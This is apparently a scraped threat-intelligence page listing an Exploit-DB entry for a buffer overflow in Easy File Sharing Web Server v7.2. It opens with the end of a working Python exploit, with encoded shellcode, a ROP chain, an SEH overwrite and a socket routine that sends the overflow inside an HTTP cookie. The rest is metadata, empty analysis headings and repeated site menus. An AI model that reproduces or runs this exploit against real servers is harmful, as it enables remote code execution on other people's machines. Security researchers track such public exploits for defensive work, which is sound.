b"\xf4\x7c\xe2\xed\xf5\x51\x77\xc4\x82\x69\x3e\xe6" sc += b"\x95\x19\xf4\x83\x6b\xc8\xc5\x53\xc7\x35\xea\x59" sc += b"\x19\x71\xcc\x81\x6c\x89\x2f\x3f\x77\x4a\x52\x9b" sc += b"\xf2\x4d\xf4\x68\xa4\xa9\x05\xbc\x33\x39\x09\x09" sc += b"\x37\x65\x0d\x8c\x94\x1d\x29\x05\x1b\xf2\xb8\x5d" sc += b"\x38\xd6\xe1\x06\x21\x4f\x4f\xe8\x5e\x8f\x37\x55" sc += b"\xfb\xdb\xd5\x80\x7b\x24\x26\xad\x21\xb3\xeb\x60" sc += b"\xda\x43\x63\xf2\xa9\x71\x2c\xa8\x25\x3a\xa5\x76" sc += b"\xb1\x4b\xa1\x88\x6d\xf3\xa1\x76\x8e\x04\xe8\xbc" sc += b"\xda\x54\x82\x15\x63\x3f\x52\x99\xb6\xaa\x58\x0d" sc += b"\xf9\x83\x64\xc7\x91\xd1\x94\xd6\xda\x5f\x72\x88" sc += b"\x4c\x30\x2a\x69\x3d\xf0\x9a\x01\x57\xff\xc5\x32" sc += b"\x58\xd5\x6e\xd8\xb7\x80\xc7\x75\x21\x89\x93\xe4" sc += b"\xae\x07\xde\x27\x24\xa2\x1f\xe9\xcd\xc7\x33\x1e" sc += b"\xaa\x27\xcb\xdf\x5f\x28\xa1\xdb\xc9\x7f\x5d\xe6" sc += b"\x2c\xb7\xc2\x19\x1b\xcb\x04\xe5\xda\xfa\x7f\xd0" sc += b"\x48\x43\x17\x1d\x9d\x43\xe7\x4b\xf7\x43\x8f\x2b" sc += b"\xa3\x17\xaa\x33\x7e\x04\x67\xa6\x81\x7d\xd4\x61" sc += b"\xea\x83\x03\x45\xb5\x7c\x66\xd5\xb2\x83\xf5\xf2" sc += b"\x1a\xec\x05\x43\x9b\xec\x6f\x43\xcb\x84\x64\x6c" sc += b"\xe4\x64\x85\xa7\xad\xec\x0c\x26\x1f\x8c\x11\x63" sc += b"\xc1\x10\x12\x80\xda\xa3\x69\xe9\xdd\x43\x8e\xe3" sc += b"\xb9\x43\x8f\x0b\xbc\x78\x46\x32\xca\xbf\x5b\x01" sc += b"\xd5\x5d\x71\x7c\x7e\xf8\x10\x3d\xe3\xfb\xcf\x02" sc += b"\x1a\x78\xe5\xfa\xd9\x60\x8c\xff\xa6\x26\x7d\x72" sc += b"\xb6\xc2\x81\x21\xb7\xc6" padding = b"\x45" * 4 # 4 bytes of padding because of the alignment, the add eax,20 instructions will make it so stack points 4 bytes after rop += padding rop += sc rop += b"\x42" * (1244 - len(rop)) nseh = struct.pack("<I", 0x43434343) seh = struct.pack("<I", 0x10022877) # add esp, 1004; ret eax_offset = 4183 buf = b"A" * 2811 # rop chain start after add esp 1004 buf += rop buf += b"A" * (4059 - len(buf)) #nseh buf += nseh + seh buf += b"A" * (eax_offset - len(buf)) buf += struct.pack("<I", 0xffffffff) #" #make sure eax always trigger exception buf += b"A" * (size - len(buf)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host ,port)) httpreq = ( b"GET /changeuser.ghp HTTP/1.1\r\n" b"User-Agent: Mozilla/4.0\r\n" b"Host:" + host.encode() + b":" + str(port).encode() + b"\r\n" b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" b"Accept-Language: en-us\r\n" b"Accept-Encoding: gzip, deflate\r\n" b"Referer: http://" + host.encode() + b"/\r\n" b"Cookie: SESSIONID=6771; UserID=" + buf + b"; PassWD=;\r\n" b"Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server try: if len(sys.argv) < 2: print("[!] Usage: python3 exploit.py <IP of Server>") sys.exit(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close() print("[+] Packet sent!") except: print("[!] Could not connect to server / Exploit failed") sys.exit(1) sys.exit(0)

Source: Exploit-DB RSS Feed

Published: Tue Mar 03 2026

Easy File Sharing Web Server v7.2 - Buffer Overflow

Medium

Exploitweb exploit

Published: Tue Mar 03 2026 (03/03/2026, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

Easy File Sharing Web Server v7.2 - Buffer Overflow

AI-Powered Analysis

Machine-generated threat intelligence

AILast updated: 04/07/2026, 11:03:47 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Pro Console: star threats, build custom feeds, automate alerts via Slack, email & webhooks.Upgrade to Pro

Technical Details

Edb Id: 52484
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Easy File Sharing Web Server v7.2 - Buffer Overflow

# Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow
# Date: 16/10/2025
# Exploit Author: Donwor
# X: @real_Donwor
# Discord: Donwor
# Website: https://github.com/D0nw0r
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 10,11
#
# Notes:
# - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it c... (13580 more characters)

Code Length: 14,080 characters

Threat ID: 69a792c9d1a09e29cbc1c30f

Added to database: 3/4/2026, 2:02:49 AM

Last enriched: 4/7/2026, 11:03:47 AM

Last updated: 4/18/2026, 2:40:03 PM

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by

Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

External Links

Original Source Raw Exploit Code Search on Google

Need more coverage?

Upgrade to Pro Console for AI refresh and higher limits.

For incident response and remediation, OffSeq services can help resolve threats faster.

Latest Threats

Breach by OffSeqOFFSEQFRIENDS — 25% OFF

Check if your credentials are on the dark web

Instant breach scanning across billions of leaked records. Free tier available.

Scan now

OffSeq TrainingCredly Certified

Lead Pen Test Professional

Technical5-day eLearningPECB Accredited

View courses

Easy File Sharing Web Server v7.2 - Buffer Overflow

AI Analysis

Technical Summary

Potential Impact

Mitigation Recommendations

Indicators of Compromise

Easy File Sharing Web Server v7.2 - Buffer Overflow

Description

AI-Powered Analysis

Technical Analysis

Potential Impact

Mitigation Recommendations

Technical Details

Indicators of Compromise

Exploit Source Code

Exploit code for Easy File Sharing Web Server v7.2 - Buffer Overflow

Community Reviews

Actions

External Links

Need more coverage?

Latest Threats

Check if your credentials are on the dark web

Lead Pen Test Professional

Keyboard Shortcuts

Navigation

Search & Filters

UI Controls

Accessibility

Easy File Sharing Web Server v7.2 - Buffer Overflow

AI Analysis

Technical Summary

Potential Impact

Mitigation Recommendations

Indicators of Compromise

Easy File Sharing Web Server v7.2 - Buffer Overflow

Description

AI-Powered Analysis

Technical Analysis

Potential Impact

Mitigation Recommendations

Technical Details

Indicators of Compromise

Exploit Source Code

Exploit code for Easy File Sharing Web Server v7.2 - Buffer Overflow

Community Reviews

Related Threats

In Other News: Satellite Cybersecurity Act, $90K Chrome Flaw, Teen Hacker Arrested

Cisco Patches Critical Vulnerabilities in Webex, ISE

Microsoft Patches Exploited SharePoint Zero-Day and 160 Other Vulnerabilities

Scans for EncystPHP Webshell, (Mon, Apr 13th)

Fake Claude Website Distributes PlugX RAT

Actions

External Links

Need more coverage?

Latest Threats

Check if your credentials are on the dark web

Lead Pen Test Professional

Keyboard Shortcuts

Navigation

Search & Filters

UI Controls

Accessibility